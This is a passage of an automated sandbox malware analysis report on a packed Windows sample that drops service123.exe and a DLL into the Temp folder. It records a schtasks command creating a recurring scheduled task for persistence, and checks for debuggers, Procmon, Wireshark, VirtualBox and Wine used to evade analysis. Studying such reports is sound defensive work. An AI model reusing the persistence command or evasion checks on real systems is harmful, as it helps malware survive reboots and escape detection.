Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: rGABp2MFj4.exe Static file information: File size 4385792 > 1048576
Source: rGABp2MFj4.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: rGABp2MFj4.exe Static PE information: Raw size of lbckixlr is bigger than: 0x100000 < 0x1a7a00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00708230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00708230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: rGABp2MFj4.exe Static PE information: real checksum: 0x43a640 should be: 0x433261
Source: rGABp2MFj4.exe Static PE information: section name:
Source: rGABp2MFj4.exe Static PE information: section name: .idata
Source: rGABp2MFj4.exe Static PE information: section name:
Source: rGABp2MFj4.exe Static PE information: section name: lbckixlr
Source: rGABp2MFj4.exe Static PE information: section name: savjojjb
Source: rGABp2MFj4.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0070A521 push es; iretd 9_2_0070A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C750C30 push eax; mov dword ptr [esp], edi 9_2_6C750DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C71ED10 push eax; mov dword ptr [esp], ebx 9_2_6C71EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E8E7A push edx; mov dword ptr [esp], ebx 9_2_6C6E8E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F4E31 push eax; mov dword ptr [esp], ebx 9_2_6C6F4E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6EA947 push eax; mov dword ptr [esp], ebx 9_2_6C6EA95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C71EAB0 push eax; mov dword ptr [esp], ebx 9_2_6C71EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F2AAC push edx; mov dword ptr [esp], ebx 9_2_6C6F2AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F0AA2 push eax; mov dword ptr [esp], ebx 9_2_6C6F0AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C708AA0 push eax; mov dword ptr [esp], ebx 9_2_6C70909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C722BF0 push eax; mov dword ptr [esp], ebx 9_2_6C722F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C722BF0 push edx; mov dword ptr [esp], ebx 9_2_6C722F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C708460 push eax; mov dword ptr [esp], ebx 9_2_6C708A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E8435 push edx; mov dword ptr [esp], ebx 9_2_6C6E8449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E04E0 push eax; mov dword ptr [esp], ebx 9_2_6C6E06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E048B push eax; mov dword ptr [esp], ebx 9_2_6C6E04A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6C1CFA push eax; mov dword ptr [esp], ebx 9_2_6C776622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6C1CFA push eax; mov dword ptr [esp], ebx 9_2_6C776622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6EA5A7 push eax; mov dword ptr [esp], ebx 9_2_6C6EA5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C722620 push eax; mov dword ptr [esp], ebx 9_2_6C722954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C722620 push edx; mov dword ptr [esp], ebx 9_2_6C722973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E06FD push eax; mov dword ptr [esp], ebx 9_2_6C6E06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E66F3 push edx; mov dword ptr [esp], ebx 9_2_6C6E6707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C7306B0 push eax; mov dword ptr [esp], ebx 9_2_6C730A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E06A6 push eax; mov dword ptr [esp], ebx 9_2_6C6E06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E06A2 push eax; mov dword ptr [esp], ebx 9_2_6C6E06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F86A1 push 890005EAh; ret 9_2_6C6F86A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6EA777 push eax; mov dword ptr [esp], ebx 9_2_6C6EA78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E070E push eax; mov dword ptr [esp], ebx 9_2_6C6E06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F0042 push eax; mov dword ptr [esp], ebx 9_2_6C6F0056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6BE0D0 push eax; mov dword ptr [esp], ebx 9_2_6C776AF6
Source: rGABp2MFj4.exe Static PE information: section name: lbckixlr entropy: 7.955153407872886
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1440098 second address: 14400A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FC7C0FA6736h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 14400A8 second address: 14400B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 143F9D3 second address: 143F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AF6FD second address: 15AF707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC7C1180B36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A6FF4 second address: 15A6FFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE651 second address: 15AE657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE657 second address: 15AE65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE7B2 second address: 15AE7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE7B8 second address: 15AE7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE7BC second address: 15AE7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AE917 second address: 15AE92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC7C0FA673Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEA8F second address: 15AEA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEA9F second address: 15AEAC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC7C0FA6748h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEAC1 second address: 15AEAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEC4B second address: 15AEC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEC51 second address: 15AEC7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FC7C1180B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC7C1180B3Bh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC7C1180B40h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AEC7F second address: 15AECA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC7C0FA6736h 0x0000000a jmp 00007FC7C0FA6749h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2BBD second address: 15B2BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2BD0 second address: 15B2BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC7C0FA6736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2BDA second address: 15B2C3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 38111C71h 0x00000012 mov di, F950h 0x00000016 push 00000003h 0x00000018 mov edx, dword ptr [ebp+122D34F6h] 0x0000001e push 00000000h 0x00000020 and edx, 1675A33Fh 0x00000026 mov di, dx 0x00000029 push 00000003h 0x0000002b add ecx, 7FE38BB0h 0x00000031 call 00007FC7C1180B39h 0x00000036 pushad 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d jl 00007FC7C1180B38h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jns 00007FC7C1180B36h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2C3E second address: 15B2C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2D70 second address: 15B2D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2D76 second address: 15B2D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2D7D second address: 15B2E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FC7C1180B3Bh 0x00000011 push edi 0x00000012 jmp 00007FC7C1180B3Eh 0x00000017 pop edi 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FC7C1180B47h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 jo 00007FC7C1180B36h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f jmp 00007FC7C1180B45h 0x00000034 popad 0x00000035 pop eax 0x00000036 mov dword ptr [ebp+122D1A11h], ebx 0x0000003c mov dword ptr [ebp+122D182Dh], esi 0x00000042 push 00000003h 0x00000044 jmp 00007FC7C1180B40h 0x00000049 push 00000000h 0x0000004b mov dword ptr [ebp+122D31C9h], eax 0x00000051 push 00000003h 0x00000053 mov edi, dword ptr [ebp+122D1864h] 0x00000059 push 92D150E2h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 ja 00007FC7C1180B36h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2E21 second address: 15B2E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2E25 second address: 15B2E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2E2B second address: 15B2ED2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C0FA674Dh 0x00000008 jmp 00007FC7C0FA6747h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f add dword ptr [esp], 2D2EAF1Eh 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FC7C0FA6738h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D1A11h], eax 0x00000036 lea ebx, dword ptr [ebp+124469D9h] 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007FC7C0FA6738h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 jc 00007FC7C0FA673Ch 0x0000005c mov dword ptr [ebp+122D2F51h], ebx 0x00000062 xchg eax, ebx 0x00000063 jo 00007FC7C0FA674Ch 0x00000069 jmp 00007FC7C0FA6746h 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 push edi 0x00000074 pop edi 0x00000075 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2ED2 second address: 15B2ED8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2F14 second address: 15B2F39 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7C0FA6743h 0x00000008 jmp 00007FC7C0FA673Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push esi 0x00000012 jnp 00007FC7C0FA6736h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2F39 second address: 15B2F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2F3D second address: 15B2F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov si, EE00h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f mov si, di 0x00000012 pop edx 0x00000013 mov di, 73C2h 0x00000017 push 8EFA2A82h 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC7C0FA6743h 0x00000024 rdtsc
